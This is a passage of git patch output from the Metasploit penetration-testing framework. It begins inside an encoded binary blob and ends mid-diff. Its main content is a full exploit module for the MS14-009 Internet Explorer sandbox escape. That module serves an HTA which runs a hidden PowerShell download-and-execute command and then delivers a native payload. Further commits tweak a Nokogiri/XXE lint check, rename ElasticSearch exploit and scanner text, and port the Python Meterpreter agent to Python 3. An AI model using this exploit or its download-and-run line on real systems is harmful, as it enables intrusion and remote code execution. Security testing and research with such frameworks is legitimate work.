z-;d`6+?UVz;aNX+y|G}+MgF@#{aF9<SMIvz?rjgbepd6~$@eVzYQcry%F3Cw;6Sd| zSX^@7b8BbacwzeX{@0%P)LRFi{^;$$?6_$8O`*r**Pc0j(fQS@-oEz6`;YJZ)X4{O zU;FBFKO9JZ_3phXt8aVXf;IoCS8nZm_{w>m+wOSq>60dvZ#om*2C9LiJvKWP&WYwN z<D1TWjGPw=V!Tfki;eN)sGi!&mDW?fN#C(?xx=@nrDkk^RNj1<c4g!0mDWdYZ3e0S zE!?2s)8eZe$E7QI8u|X{1o`5_-Sx>-W8=%SazXNeWfg#<iCU`H@Y(o@(qDP5ddT@0 zLC4gERSWOpHnu+gZl2Z0w2qaO6yyJqi~IQG6lx!v;WSH6)F*J4?;pvt-Q`1R+NT(& z$6ujnTYVib3pF+K)OdKdbB;dS!DqJ{t9W`mJbP*B{9JRkLvHU@Rq$2#>hSFK)y=b` zk@rsx@kR@$4)GCY7&J78XY+<spt-W9nrFImdAX;lvAJ<|OD^IPsA#UAv(7o2H@g~Y zSMw6vveeXI<#2>}v8}m9?$#x_o%tTz+-F+xh}q0H$oZDr`lKBf`9wLXR9D5DYS(e+ zXiatVh-a#Iq4oK4id`%pURIx94$rP=UeK_P@2fY>cC^;!Rmyk0!?Rac)HPSncFY~& z6PkPMR6=vd<S8_Fq;NzJ&9&<d%lO8a$j+$IgL|5OvVMl1tNZmreX)MAzDB=X|FphS zKi>I4XR-5p&LhrqT`jJsT`#&a-Jf>%x?gaA$e3kZWjtv7%t-Sr^E7*I@|@@G_RjGw z_AU2a@9XkC?CbLl`hMv9lkY9xBD2)2GS{28n)jNI`hVy51d0MT2W|^I7nmKqICy99 zy3pT39|+G5yTak{>hQYoli}}&XGI>3yc9VYsfoT6{drU-^{wRdL;6C!S$|eP&G|9s zYG<qSZs)7cNv=y=Uvu5>`m-y;J<olfyW0J-`+$3vvBan`ZZPgN28^E?Cworw%=awy zZ1eotlkV;DzV6k0Q+>t0%Y7St4%6)q`_J{?>hJN#0?!8D4qh2LBfK!&7aj=zI(%y6 z+{h)7MC1l?^IGJc$mvl}G#<Sq+8q5(^!w2lqkoBNbc`9u{v>_2?$q=2bM>{<-Z%8e z^&jZ_^h5fvKE-*ebEY%L>2gM#ac84*jw|Gv?<#dY>iVN=*ma!S>ptJT)V<Q(?S9z( z6Zc=;aiiL}nwrh>T<6*B`Ksq-&#Ru-J-_n&&hsbFQO_jrRPV{&>E4fdKkl95^?D=T z^SmYAGVi6{8gG;L8t={CZQieYf9gHx{hK$#cfZeN#?2<P!yGiv_c!~$?Ejj7X|OrC zIrxR(mxJBG?ZKYl^T9WR9}LY1IYKi-*`b_}9x_5^=$cSRXme;ws5A7}(B!a#_Q?tB zVI#aWe0BJN@Gk17KfIed8VnDG_k=$hnHkBB<V5tyt<kN~??nfr&qohNMM)c?-JH6q z$MhZgL;7R-e^4*SJ2Rahbzb9q)|pK$Jn4FcdI-38yMO5}GcGk&8EcGs<8tE)<CDfl z<2vKB#ulT~_>ytEvEAq~?nCNcH{M5!K1Dko^-l7=&zI$!=9})z^R4k+=iBVt;_E~L zxB9w$+kHL0Klp}yM}3-^ZeC`#np@1<%&lg(x!ruq{GEA*Kii+<*Zqdy^oRU0e}Vt= z{!V|Ff2+US|IJ`eXdrZ2*ctYQw?`g|^hYU3oO6+YGQC<~r{AitaDB;m#5>^qq4yKM z|1it^U-#DpZwc>2eqRZn8Hq*;Ba0)|k+#U^BezBFjNBJ_F>-wLqtW8%1<`fU8=^Nw z??8fnC49@-mq&(9(|@7=UO&Zoh4W44FI-=6_fRK4ch5BZMyatHnTR39%RHBQs_1c_ z@?7h=*|Qay-sySFv)l6%<YSmuqNaP#@jAUe<l<a!v3H60BJWCXwYMJGX!Evvuk+sE z{erj4d%O2;q~rnbx4n;fcY6oD&wF3?{=|F0`)ltXyl;Bn_D-gMWKpLd@tx&6$EW+e zzKAd1x4?ISZ<+66UzM-c*XX;#x50Of@3X!eeYg0&;@d`D@9;h3d(`)&Z@~AQ?<L=l zeLwa6%J+uv2=$+4PBBk1r<tdlXPUFkT+?F)%$QkZE;LKbi_LO#wb@`cGe&GQuQzWn zJIybeUp4PBzhORVK4T7<ubRIw7Y2?5KN6ZBDh*u}x-}FJuL^Gqe<S=jviET0&ylp~ zl<1mhee}j?SM=M_$D~dZ%;CVB`rq`=x|SeO*BW0m?l6w{_L;vl-!#wmf63qLf6U() z{9SMcTvvqd3OyeBW9ToTGZ}}LhAYB}@Gaq&!`Ts6q%_hP>4<zW@(twRvB>u#zl!`J zG939^WJdJts581SdSP^B^s;DMbR(_$<!E>GuIR(jN3A~aTJ-hkk*Lh5hseu0x?7*G zU!X73SL;ps75X*$W__Ffq+aQ~()nrU7o2xGzvg_z`6K7=oPTk?<DAM}cb6;T%6F}D z-Q?<W-OVWXGuNB0w_P50o_izX#f$F4ZjTW(<{7scKVZagdn%ENuX(=hdCs%f^P1;? z=hvP^j1I5U3(ls_*PGXwHzECBH=j2TnZxE3f0q9v{$hWrzuNyr|Kt7_{IB`n@c+?& zV&DS-XJAp_hQKcZq2Ql`XNO)5ofY<no2c#IhW|#L%#C;>;mFcRRiq*E$;fq)TNtZl zY^0D|)SPmc-lreYPhjkGIL~+f(D|10gRYObvRzTvh0G-zT%UE_=(^oCNO|VCtK3(( zr%;Yn#y5=DjDyA-#&Mn#J##!ojM-J522Z=^M$fIDdpr+$`aJ`l7m@YJjC}dXcf$J> z?^8(cKFU{aUP;-`^55n^HLx^rX<$R(jliS9UkCpfTo76kni~!<s#k>1Vw5tYc~PyK z=h4Y-F742+_vptt{Z8Gr%vIsK*7cHW8e?(=b6uJdF^U+EzHR);IK|`i{Dv_&%lnY` zN$)G(pL?hI)>}PbJ2Jo5_cP|Y$>u5M3{yv@E6k_O?<2WynJ4)_=r4=jAN@mA+rj-s z((HBCyYf8?Jc~W|dmf=ozx3pIUG&-2-WwUcAN2m-dxGx+zPa?ekncQS+*j>eM>?Nj zWcxZj>~-IteT9r>_n6uKfdBQtuL6Gx<OB<XTY|R+w=tT(9DF@^F!<ZxAA)ZM7llef zH-~NubtB#Pg}xc;4}FA@d|tRX{Ajo~G8Acx9+Ecew}v+D>w2%Vk5TzW=g*ygcAoB< z<67$Kb`7}qyR(cE->v4!fl~wFKz^V)ur_c?=)uUtkw@qcPeh)M{72-u$o<hrqR*)D zY)IYnJzcNV@6-1=PjS8DI?a8KJM3Oetv0)_bKmCvn)^}rv&?tDhxeI=Vazwmj1T&~ z%*9py%l+&8oBVzLGXlARy8@2~1_Hkh93PAaR|KyOelge^d@lH6@Qjcrw4Pb&bD^!F zM?=q{LwpzsT@)@0Z;tdZ&T9L4r-P!sq2KJ(-0$;zz%$(w@|=$}UCq3DljjcP>0!@z zJkNSw@chX0Q`+FSwC!7-H17%CQ@p2n&+vZ28}gPiepY&Gz0KaMyx;Zyh|$sKd((Hi z{|x`9nJ0Sv5Bk65f6^ZatO!;GGsCxs?+u%gSfn^|apaeb51wdmR6ESQSMu?k{*r!` zE6Y8@eXsjL_hXd(LL*_^Yq&f&GaF5R*Zdm_#X<$hZC3c~uo=EEd{g)hPJc+V?!SM+ zoEO@|95W?S6ZufIG};t>HYyt}*`zZGJ?;`lmapg!>JRHr=uhiEB;|d~EQj^K>gi5- zrniT=rp8(4OgLMdZO#qOcIPJN7H6lk%emFr<Lq_raAvqNU0JS~^w%7h?lN2^I!nw| z;3{$zyW;3BWv&&ja#xkB##QG^(4X7r(e18Ht`65`*A`bNqt#X<XS=J%)$7{f+UeR& zPv7I(=Q`jz<T~Oy>PmNKx~EYWGu=6E!yR%LxQpGT?iGv#b?z4T2KOfSW_PE1t9v`z z=1zAX^WdO+k9!}Q-68i8_fdDck!egbW*9S#9AqbC6d1+Kkt>WUqt0kCHW-_X&FBnU z(HMG-okpLr+ZZ(V82gL^#v$W~anwlnWO`<JW_ofw22xSrDfX0lRxsAod0IRhJe$zF zI+<IydwQ8&`<Pt^J$pR+7*7v*j-Z33do#V$yfeHry*XY3DJftiD)p}LR(b2ZE#3{@ zP2SDkPVZLlc5knDr?=0VVfT3VF~1)29zkbG_hq87%<#?h<@gNxcmcX-sc!}IYMrlz zS#^_-hGYZmAkg95oNSqH=XU2l=YHn_=RxNo=b_M%(9uwOI5RvgJR>|4?aT;=!Ugo~ z((sCKRk$wP65bHr6y6-}3~vo@5BH*%^r5j0GKTL99|#``9|<1~r$;g)(;_p_-f|*F zBorw?c1t5G7}x6}Es+h8O_9x!&dAot_DFAJXQVH(J2DvA6WJFz5IGb%5;+=4k7h=v zMQ5<Xk`pzep=bfxO=)yRv?^K`ZHaD(Zi;S>cA^n(rzh-;_C<FyEAENziymOyITAf8 zV^1ti+jAVx$mp5+G<}9XQ_s;2J){@t#d@i}La);6^cH=CzKOZAQ{Sp@*Lzu+^y$0x zL46N$eE=Q%h<+5w&U8+5&agCX!x?fGuyQGNu5eZ%=Pk(iCaWH|Qir|Hos4q3orBIj z)aL=}@`&@OGaZSa=9+=b=OFJPWW5+UUxAF*S@YE<B)b!--i}1?boKokBs#;$GNv02 zBiqmo(}*$e#2FLIS;r)dHly9>Ko9ORy3v7m7`u#qRyIS%USmJ=<zZvk&^#HQEXFv8 zC)=ZYOizs2Gwvz#lzVDC2~QhyXoqKur_0mr>GACF?6PLkA+&`3o`aslmgbn@%|d&0 zc(c8_*Yw7`Mcz2;igMN!2}^hE@NPkK>}LJ6!@JAdkKQ}v-Rs@YO5?D1m=#rqr7=2u z+31U=FXk&^<|^}*`)Yg%Uz@Mp*TMYNg;p+l;x1o5TH+A1=6>Hn-(hrg&CD>f%;~1X z%x3;HE$uLFmNBc>m<hAZY-bI##q45+?=g3nyUc!b0L^f(x!*i!9!8hZ{26F7)BO%~ zdL4Z}<}dQc{bl}ge~mxkZ}YeNJN#Q1v%6X6?eOpN_xlI@L;k(~{r-dg!~S8v7RU%> z1*Qiaf$V@DFat4GsqsKrpgd3$NCesf?SYQKmOxjaJJ1u@5!e;zXI2^t><#P>91I)| z3<tDeMvxEB1|71o9Z$2K&B~@%==2M%JWbn;^X~uDD0YxOc9>o^Oh4l>>u3gjEsNeZ zo&M&a$JyLX`dy5kS47{7)BDQkf93SR8v0;@Uf4!IY^Nu7&=<GR8@uR_-So&F`s5CJ z<u3YVKRt7RzBxqi+)Mx5PY*pvA3aPj9ajA`!Tu2QhNh?M8T8dGdh2xhtAie!O`qlY zP*!;%)_Dbb5q&pK?=7SMmeYf4=)(!Uik8?;?S+Cd=JL{DS+G3V7VKaxy46~V_6Bzc z_XPK%yBrE04ju^}4NkLGq-IFXg~g$&P)n%IT9<Z)dP99^Gee<0p#!0VAsG!b!&%{M z#=%%P&KOt~t_im>0=9>{82`E%{dQR^)q{+D>5&Y^y(~sOBVsb@#ToPJ8132_?>Zt| z&>wa&)=iI^)avL+wuPFL5p3M})t;seQ!T0EmyBL<O5A3RTK)PE<CHx@Ih@(fB1WYa zX5DVaqCw|g#`KxYutm(O<;<uFW>b5t>0$QV&D^=)b<lN~Rq|1n=FS+IH%)8iEOWOp zS9ZB~x%aw<ISeD+8bflJ6N{J+YZyDWT4Tn(k+I?^^WSvFh%#ooHpYbQj0S^@0~z%F zBKms=eSE;Xhkl*K45c$W#hIBB^xqxyS?R5rrnV(b3t95e?;M~MLyV?-Q|6~(##GIf z?oyh>G*>@!@U(w=&fOdkIoT5I40a`@r3XE5M{s9wSFkVGkK_yl2ZKYF{Ok+v4;~ni zqG9An3#ErLLYbkg(6rE4O-o5uQK&c+XAM}!DzF?Ws|nSG5|*rO2(^bcjqHSUp=)-B zwugF<z8#^Rp<R{??q;80(2~Txp?#tKNqL;coNO>3mog8xGY@w#6ZeL9AcY7^cN%Aa z@SeHTWTuKSR~0c^#hI_ln6b*8)0v0*(K-e^LueeCXc@)m7MmD*2N`K+FuD@?|HAcu E0ARpYAOHXW literal 0 HcmV?d00001 diff --git a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb new file mode 100644 index 0000000000..fd39ad0a0f --- /dev/null +++ b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb @@ -0,0 +1,124 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'rex' +require 'msf/core/exploit/exe' +require 'msf/core/exploit/powershell' + +class Metasploit3 < Msf::Exploit::Local + Rank = GreatRanking + + include Msf::Exploit::Powershell + include Msf::Exploit::EXE + include Msf::Exploit::Remote::HttpServer + include Msf::Post::Windows::Priv + + def initialize(info={}) + super( update_info( info, + 'Name' => 'MS14-009 .NET Deployment Service IE Sandbox Escape', + 'Description' => %q{ + This module abuses a process creation policy in the Internet Explorer Sandbox which allows + to escape the Enhanced Protected Mode and execute code with Medium Integrity. The problem + exists in the .NET Deployment Service (dfsvc.exe), which can be run as Medium Integrity + Level. Further interaction with the component allows to escape the Enhanced Protected Mode + and execute arbitrary code with Medium Integrity. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'James Forshaw', # Vulnerability Discovery and original exploit code + 'juan vazquez' # metasploit module + ], + 'Platform' => [ 'win' ], + 'SessionTypes' => [ 'meterpreter' ], + 'Stance' => Msf::Exploit::Stance::Aggressive, + 'Targets' => + [ + [ 'IE 8 - 11', { } ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate'=> "Feb 11 2014", + 'References' => + [ + ['CVE', '2014-0257'], + ['MSB', 'MS14-009'], + ['BID', '65417'], + ['URL', 'https://github.com/tyranid/IE11SandboxEscapes'] + ] + )) + + register_options( + [ + OptInt.new('DELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10]) + ]) + end + + def exploit + print_status("Running module against #{sysinfo['Computer']}") unless sysinfo.nil? + + mod_handle = session.railgun.kernel32.GetModuleHandleA('iexplore.exe') + if mod_handle['return'] == 0 + fail_with(Failure::NotVulnerable, "Not running inside an Internet Explorer process") + end + + unless get_integrity_level == INTEGRITY_LEVEL_SID[:low] + fail_with(Failure::NotVulnerable, "Not running at Low Integrity") + end + + begin + Timeout.timeout(datastore['DELAY']) { super } + rescue Timeout::Error + end + end + + def primer + exploit_uri = "#{get_uri}/#{rand_text_alpha(4 + rand(4))}.hta" + session.railgun.kernel32.SetEnvironmentVariableA("MYURL", exploit_uri) + + temp = session.sys.config.getenv('TEMP') + + print_status("Loading Exploit Library...") + + session.core.load_library( + 'LibraryFilePath' => ::File.join(Msf::Config.data_directory, "exploits", "CVE-2014-0257", "CVE-2014-0257.dll"), + 'TargetFilePath' => temp + "\\CVE-2014-0257.dll", + 'UploadLibrary' => true, + 'Extension' => false, + 'SaveToDisk' => false + ) + end + + def on_request_uri(cli, request) + if request.uri =~ /\.hta$/ + print_status("Sending hta...") + download_and_run = "IEX ((new-object net.webclient).downloadstring('#{get_uri}/#{rand_text_alpha(4 + rand(4))}.psh'))" + command = "powershell.exe -w hidden -nop -c #{download_and_run}" + hta = <<-eos +<script> +var command = "cmd.exe /c #{command}"; +var shell = new ActiveXObject("WScript.Shell"); +shell.Run(command); +</script> + eos + send_response(cli, hta, {'Content-Type'=>'application/hta'}) + elsif request.uri =~ /\.psh$/ + print_status("Sending psh payload...") + data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded) + send_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) + else + send_not_found(cli) + end + end + + def get_dll + path = File.join(Msf::Config.data_directory, "exploits", "CVE-2014-0257", "CVE-2014-0257.dll") + dll = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } + + dll + end + +end + From 2ce6f325f5a3aaf3757b790e0f156fa328ea7351 Mon Sep 17 00:00:00 2001 From: Tod Beardsley <tod_beardsley@rapid7.com> Date: Thu, 29 May 2014 11:52:17 -0500 Subject: [PATCH 405/853] Be more specific with Nokogiri check There are still strong reservations about using Nokogiri to parse untrusted XML data. http://www.wireharbor.com/hidden-security-risks-of-xml-parsing-xxe-attack/ It is also believed that many desktop operating systems are still shipping out-of-date and vulnerable libxml2 libraries, which become exposed via Nokogiri. For example: http://stackoverflow.com/questions/18627075/nokogiri-1-6-0-still-pulls-in-wrong-version-of-libxml-on-os-x While this isn't a problem for binary builds of Metasploit (Metasploit Community, Express, or Pro) it can be a problem for development versions or Kali's / Backtrack's version. So, the compromise here is to allow for modules that don't directly expose XML parsing. I can't say for sure that the various libxml2 vulnerabilities (current and future) aren't also exposed via `Nokogiri::HTML` but I also can't come up with a reasonable demo. Metasploit committers should still look at any module that relies on Nokogiri very carefully, and suggest alternatives if there are any. But, it's sometimes going to be required for complex HTML parsing. tl;dr: Use REXML for XML parsing, and Nokogiri for HTML parsing if you absolutely must. --- tools/msftidy.rb | 20 ++++++++++++++++++-- 1 file changed, 18 insertions(+), 2 deletions(-) diff --git a/tools/msftidy.rb b/tools/msftidy.rb index 8c5d82458d..81e3a5367e 100755 --- a/tools/msftidy.rb +++ b/tools/msftidy.rb @@ -113,16 +113,32 @@ class Msftidy end end + # Updated this check to see if Nokogiri::XML.parse is being called + # specifically. The main reason for this concern is that some versions + # of libxml2 are still vulnerable to XXE attacks. REXML is safer (and + # slower) since it's pure ruby. Unfortunately, there is no pure Ruby + # HTML parser (except Hpricot which is abandonware) -- easy checks + # can avoid Nokogiri (most modules use regex anyway), but more complex + # checks tends to require Nokogiri for HTML element and value parsing. def check_nokogiri - msg = "Requiring Nokogiri in modules can be risky, use REXML instead." + msg = "Using Nokogiri in modules can be risky, use REXML instead." has_nokogiri = false + has_nokogiri_xml_parser = false @source.each_line do |line| if line =~ /^\s*(require|load)\s+['"]nokogiri['"]/ has_nokogiri = true break end end - error(msg) if has_nokogiri + if has_nokogiri + @source.each_line do |line| + if line =~ /Nokogiri::XML.parse/ or line =~ /Nokogiri::XML::Reader/ + has_nokogiri_xml_parser = true + break + end + end + end + error(msg) if has_nokogiri_xml_parser end def check_ref_identifiers From dfa61b316ec7184edaa8ec60da864f3acdd62bd7 Mon Sep 17 00:00:00 2001 From: sinn3r <wei_chen@rapid7.com> Date: Thu, 29 May 2014 12:20:40 -0500 Subject: [PATCH 406/853] A bit of description change --- .../exploits/multi/elasticsearch/script_mvel_rce.rb | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/modules/exploits/multi/elasticsearch/script_mvel_rce.rb b/modules/exploits/multi/elasticsearch/script_mvel_rce.rb index 9e5a2db466..4cea8269d3 100644 --- a/modules/exploits/multi/elasticsearch/script_mvel_rce.rb +++ b/modules/exploits/multi/elasticsearch/script_mvel_rce.rb @@ -16,11 +16,11 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'ElasticSearch Dynamic Script Arbitrary Java Execution', 'Description' => %q{ This module exploits a remote command execution vulnerability in ElasticSearch, - exploitable by default on ElasticSearch prior to 1.2.0. The problem exists on - the REST API, accessible without authentication, neither authorization, where - the search function allows for dynamic scripts execution, which allows remote - attackers to execute arbitrary Java code. This module has been tested successfully - on ElasticSearch 1.1.1 on Ubuntu Server 12.04 and Windows XP SP3. + exploitable by default on ElasticSearch prior to 1.2.0. The bug is found in the + REST API, which requires no authentication or authorization, where the search + function allows dynamic scripts execution, and can be used for remote attackers + to execute arbitrary Java code. This module has been tested successfully on + ElasticSearch 1.1.1 on Ubuntu Server 12.04 and Windows XP SP3. }, 'Author' => [ From aea0379451b5cc464ac5563a7e5219eb36798b46 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Thu, 29 May 2014 12:37:51 -0500 Subject: [PATCH 407/853] Fix typos --- .../scanner/elasticsearch/indeces_enum.rb | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/modules/auxiliary/scanner/elasticsearch/indeces_enum.rb b/modules/auxiliary/scanner/elasticsearch/indeces_enum.rb index 12895c27bc..196d77aec0 100644 --- a/modules/auxiliary/scanner/elasticsearch/indeces_enum.rb +++ b/modules/auxiliary/scanner/elasticsearch/indeces_enum.rb @@ -13,9 +13,9 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'ElasticSearch Indeces Enumeration Utility', + 'Name' => 'ElasticSearch Indices Enumeration Utility', 'Description' => %q{ - This module enumerates ElasticSearch Indeces. It uses the REST API + This module enumerates ElasticSearch Indices. It uses the REST API in order to make it. }, 'Author' => @@ -36,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - vprint_status("#{peer} - Querying indeces...") + vprint_status("#{peer} - Querying indices...") begin res = send_request_raw({ 'uri' => '/_aliases', @@ -66,10 +66,10 @@ class Metasploit3 < Msf::Auxiliary :name => 'elasticsearch' ) - indeces = [] + indices = [] json_body.each do |index| - indeces.push(index[0]) + indices.push(index[0]) report_note( :host => rhost, :port => rport, @@ -80,8 +80,8 @@ class Metasploit3 < Msf::Auxiliary ) end - if indeces.length > 0 - print_good("#{peer} - ElasticSearch Indeces found: #{indeces.join(", ")}") + if indices.length > 0 + print_good("#{peer} - ElasticSearch Indices found: #{indices.join(", ")}") end end From d8dcfd8f41a219956c20d3045348b6c8bda9a8e2 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre <zeroSteiner@gmail.com> Date: Thu, 29 May 2014 13:48:15 -0400 Subject: [PATCH 408/853] Update pymeterpreter netlink to support python3 --- data/meterpreter/ext_server_stdapi.py | 53 ++++++++++++++++++++++++--- data/meterpreter/meterpreter.py | 5 ++- 2 files changed, 52 insertions(+), 6 deletions(-) diff --git a/data/meterpreter/ext_server_stdapi.py b/data/meterpreter/ext_server_stdapi.py index ae9cab6cb8..c22b6daa17 100644 --- a/data/meterpreter/ext_server_stdapi.py +++ b/data/meterpreter/ext_server_stdapi.py @@ -48,6 +48,16 @@ try: except ImportError: has_winreg = False +if sys.version_info[0] < 3: + is_bytes = lambda obj: issubclass(obj.__class__, str) + bytes = lambda *args: str(*args[:1]) + NULL_BYTE = '\x00' +else: + is_bytes = lambda obj: issubclass(obj.__class__, bytes) + str = lambda x: __builtins__['str'](x, 'UTF-8') + NULL_BYTE = bytes('\x00', 'UTF-8') + long = int + if has_ctypes: # # Windows Structures @@ -503,6 +513,40 @@ def get_stat_buffer(path): return st_buf def netlink_request(req_type): + import select + # See RFC 3549 + NLM_F_REQUEST = 0x0001 + NLM_F_ROOT = 0x0100 + NLMSG_ERROR = 0x0002 + NLMSG_DONE = 0x0003 + + sock = socket.socket(socket.AF_NETLINK, socket.SOCK_RAW, socket.NETLINK_ROUTE) + sock.bind((os.getpid(), 0)) + seq = int(time.time()) + nlmsg = struct.pack('IHHIIB15x', 32, req_type, (NLM_F_REQUEST | NLM_F_ROOT), seq, 0, socket.AF_UNSPEC) + sock.send(nlmsg) + responses = [] + if not len(select.select([sock.fileno()], [], [], 0.5)[0]): + return responses + raw_response_data = sock.recv(0xfffff) + response = cstruct_unpack(NLMSGHDR, raw_response_data[:ctypes.sizeof(NLMSGHDR)]) + raw_response_data = raw_response_data[ctypes.sizeof(NLMSGHDR):] + while response.type != NLMSG_DONE: + if response.type == NLMSG_ERROR: + break + response_data = raw_response_data[:(response.len - 16)] + responses.append(response_data) + raw_response_data = raw_response_data[len(response_data):] + if not len(raw_response_data): + if not len(select.select([sock.fileno()], [], [], 0.5)[0]): + break + raw_response_data = sock.recv(0xfffff) + response = cstruct_unpack(NLMSGHDR, raw_response_data[:ctypes.sizeof(NLMSGHDR)]) + raw_response_data = raw_response_data[ctypes.sizeof(NLMSGHDR):] + sock.close() + return responses + +def _netlink_request(req_type): # See RFC 3549 NLM_F_REQUEST = 0x0001 NLM_F_ROOT = 0x0100 @@ -699,9 +743,8 @@ def stdapi_sys_process_get_processes_via_proc(request, response): cmd = open(os.path.join('/proc', pid, 'cmdline'), 'rb').read(512).replace('\x00', ' ') status_data = open(os.path.join('/proc', pid, 'status'), 'rb').read() status_data = map(lambda x: x.split('\t',1), status_data.split('\n')) - status_data = filter(lambda x: len(x) == 2, status_data) status = {} - for k, v in status_data: + for k, v in filter(lambda x: len(x) == 2, status_data): status[k[:-1]] = v.strip() ppid = status.get('PPid') uid = status.get('Uid').split('\t', 1)[0] @@ -974,7 +1017,7 @@ def stdapi_net_config_get_interfaces(request, response): else: return ERROR_FAILURE, response for iface_info in interfaces: - iface_tlv = '' + iface_tlv = bytes() iface_tlv += tlv_pack(TLV_TYPE_MAC_NAME, iface_info.get('name', 'Unknown')) iface_tlv += tlv_pack(TLV_TYPE_MAC_ADDRESS, iface_info.get('hw_addr', '\x00\x00\x00\x00\x00\x00')) if 'mtu' in iface_info: @@ -1002,7 +1045,7 @@ def stdapi_net_config_get_interfaces_via_netlink(): 0x0100: 'PROMISC', 0x1000: 'MULTICAST' } - iface_flags_sorted = iface_flags.keys() + iface_flags_sorted = list(iface_flags.keys()) # Dictionaries don't maintain order iface_flags_sorted.sort() interfaces = {} @@ -1106,7 +1149,7 @@ def stdapi_net_config_get_interfaces_via_osxsc(): hw_addr = hw_addr.replace(':', '') hw_addr = hw_addr.decode('hex') iface_info['hw_addr'] = hw_addr - ifnames = interfaces.keys() + ifnames = list(interfaces.keys()) ifnames.sort() for iface_name, iface_info in interfaces.items(): iface_info['index'] = ifnames.index(iface_name) diff --git a/data/meterpreter/meterpreter.py b/data/meterpreter/meterpreter.py index f80318e13d..63a3f43e8e 100644 --- a/data/meterpreter/meterpreter.py +++ b/data/meterpreter/meterpreter.py @@ -510,6 +510,9 @@ class PythonMeterpreter(object): if not hasattr(os, 'fork') or (hasattr(os, 'fork') and os.fork() == 0): if hasattr(os, 'setsid'): - os.setsid() + try: + os.setsid() + except OSError: + pass met = PythonMeterpreter(s) met.run() From 17fb48eaa302ef3eb7bdcb3fa791e9aed73dc2a4 Mon Sep 17 00:00:00 2001 From: William Vu <William_Vu@rapid7.com> Date: Thu, 29 May 2014 13:06:47 -0500 Subject: [PATCH 409/853] Refactor check_nokogiri in msftidy --- tools/msftidy.rb | 14 ++++++-------- 1 file changed, 6 insertions(+), 8 deletions(-) diff --git a/tools/msftidy.rb b/tools/msftidy.rb index 81e3a5367e..949c20ce2c 100755 --- a/tools/msftidy.rb +++ b/tools/msftidy.rb @@ -125,17 +125,15 @@ class Msftidy has_nokogiri = false has_nokogiri_xml_parser = false @source.each_line do |line| - if line =~ /^\s*(require|load)\s+['"]nokogiri['"]/ - has_nokogiri = true - break - end - end - if has_nokogiri - @source.each_line do |line| - if line =~ /Nokogiri::XML.parse/ or line =~ /Nokogiri::XML::Reader/ + if has_nokogiri + if line =~ /Nokogiri::XML\.parse/ or line =~ /Nokogiri::XML::Reader/ has_nokogiri_xml_parser = true break end + else + if line =~ /^\s*(require|load)\s+['"]nokogiri['"]/ + has_nokogiri = true + end end end error(msg) if has_nokogiri_xml_parser From 15dc33591bab1ff3e66da482f04ca0f5299c0aad Mon Sep 17 00:00:00 2001 From: Spencer McIntyre <zeroSteiner@gmail.com> Date: Thu, 29 May 2014 15:09:09 -0400 Subject: [PATCH 410/853] In pymeterpreter use a MeterpreterFile obj for Py v3 --- data/meterpreter/ext_server_stdapi.py | 19 ++++++++------- data/meterpreter/meterpreter.py | 34 +++++++++++++++++---------- 2 files changed, 33 insertions(+), 20 deletions(-) diff --git a/data/meterpreter/ext_server_stdapi.py b/data/meterpreter/ext_server_stdapi.py index c22b6daa17..416e2dbc41 100644 --- a/data/meterpreter/ext_server_stdapi.py +++ b/data/meterpreter/ext_server_stdapi.py @@ -508,7 +508,7 @@ def get_stat_buffer(path): blocks = si.st_blocks st_buf = struct.pack('<IHHH', si.st_dev, min(0xffff, si.st_ino), si.st_mode, si.st_nlink) st_buf += struct.pack('<HHHI', si.st_uid, si.st_gid, 0, rdev) - st_buf += struct.pack('<IIII', si.st_size, si.st_atime, si.st_mtime, si.st_ctime) + st_buf += struct.pack('<IIII', si.st_size, long(si.st_atime), long(si.st_mtime), long(si.st_ctime)) st_buf += struct.pack('<II', blksize, blocks) return st_buf @@ -603,7 +603,7 @@ def channel_open_stdapi_fs_file(request, response): else: fmode = 'rb' file_h = open(fpath, fmode) - channel_id = meterpreter.add_channel(file_h) + channel_id = meterpreter.add_channel(MeterpreterFile(file_h)) response += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id) return ERROR_SUCCESS, response @@ -737,11 +737,12 @@ def stdapi_sys_process_getpid(request, response): def stdapi_sys_process_get_processes_via_proc(request, response): for pid in os.listdir('/proc'): - pgroup = '' + pgroup = bytes() if not os.path.isdir(os.path.join('/proc', pid)) or not pid.isdigit(): continue - cmd = open(os.path.join('/proc', pid, 'cmdline'), 'rb').read(512).replace('\x00', ' ') - status_data = open(os.path.join('/proc', pid, 'status'), 'rb').read() + cmdline_file = open(os.path.join('/proc', pid, 'cmdline'), 'rb') + cmd = str(cmdline_file.read(512).replace(NULL_BYTE, bytes(' ', 'UTF-8'))) + status_data = str(open(os.path.join('/proc', pid, 'status'), 'rb').read()) status_data = map(lambda x: x.split('\t',1), status_data.split('\n')) status = {} for k, v in filter(lambda x: len(x) == 2, status_data): @@ -893,7 +894,8 @@ def stdapi_fs_delete_dir(request, response): @meterpreter.register_function def stdapi_fs_delete_file(request, response): file_path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value'] - os.unlink(file_path) + if os.path.exists(file_path): + os.unlink(file_path) return ERROR_SUCCESS, response @meterpreter.register_function @@ -955,7 +957,8 @@ def stdapi_fs_md5(request, response): @meterpreter.register_function def stdapi_fs_mkdir(request, response): dir_path = packet_get_tlv(request, TLV_TYPE_DIRECTORY_PATH)['value'] - os.mkdir(dir_path) + if not os.path.isdir(dir_path): + os.mkdir(dir_path) return ERROR_SUCCESS, response @meterpreter.register_function @@ -1423,7 +1426,7 @@ def 